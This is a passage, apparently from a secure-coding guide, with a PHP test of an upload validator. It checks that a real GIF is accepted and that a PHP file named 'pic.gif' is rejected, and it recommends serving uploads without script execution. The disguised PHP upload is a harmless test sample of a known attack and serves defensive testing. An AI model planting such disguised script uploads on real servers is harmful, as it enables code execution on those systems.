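file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
                      . "!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;");
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'x';");

assert(preg_match('/^[0-9a-f]{32}\.gif$/', (string)accept_upload('pic.gif', $gif)) === 1);
assert(accept_upload('pic.gif', $php) === null);
unlink($gif);
unlink($php);
echo "upload validation checks passed", PHP_EOL;
```

The storage directory should additionally be served without script execution (or not served at all, with a download handler in front of it), so that even a validation slip does not turn into code execution.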